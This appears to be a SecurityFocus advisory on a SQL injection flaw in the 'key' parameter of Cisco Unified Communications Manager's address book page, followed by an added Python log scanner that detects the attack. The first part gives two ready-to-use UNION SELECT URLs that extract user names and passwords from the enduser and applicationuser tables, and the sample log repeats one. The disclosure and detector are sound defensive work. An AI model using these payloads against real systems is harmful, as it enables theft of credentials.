Cisco Unified Communications Manager 'key' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following examples are available:

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+SELECT+'','',firstname,lastname,userid,password+from+enduser;--

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+SELECT+'','','',user,'',password+from+applicationuser;--
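
For defenders reviewing web access logs, the following added example (not part of the original advisory and not Cisco code) flags requests to the affected page whose decoded 'key' parameter carries SQL syntax. The combined log format, the heuristic names and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

TARGET_PATH = "/ccmuser/personaladdressbookedit.do"  # from the advisory URLs
# Heuristics (assumptions, not vendor signatures) for the decoded 'key' value.
SQLI_PATTERNS = [
    ("quote", re.compile(r"'")),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("comment", re.compile(r"--|/\*")),
    ("credential_table", re.compile(r"\b(?:enduser|applicationuser)\b", re.I)),
]
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed sample entries; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /ccmuser/'
    'personaladdressbookEdit.do?key=1f3a9c HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2010:10:00:05 +0000] "GET /ccmuser/'
    "personaladdressbookEdit.do?key=%27+UNION+ALL+SELECT+%27%27,%27%27,"
    'firstname,lastname,userid,password+from+enduser;-- HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /ccmuser/'
    'other.do?key=%27 HTTP/1.1" 200 900',  # other.do is a made-up path
]


def inspect_line(line):
    """Return names of heuristics matched by the 'key' parameter, if any."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.lower() != TARGET_PATH:
        return []
    hits = []
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "key":
            decoded = unquote_plus(value)  # decode '+' and %xx before matching
            hits += [n for n, p in SQLI_PATTERNS if p.search(decoded) and n not in hits]
    return hits


def scan(lines):  # (index, client, hits) for every suspicious entry
    return [(i, ln.split()[0], h) for i, ln in enumerate(lines) if (h := inspect_line(ln))]


if __name__ == "__main__":
    for idx, client, hits in scan(SAMPLE_LOG):
        print(f"line {idx}: {client} matched {', '.join(hits)}")
```

A legitimate address-book key should match none of these heuristics, so any hit on this path is worth correlating with the response size and the requesting account.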

Copyright 2010, SecurityFocus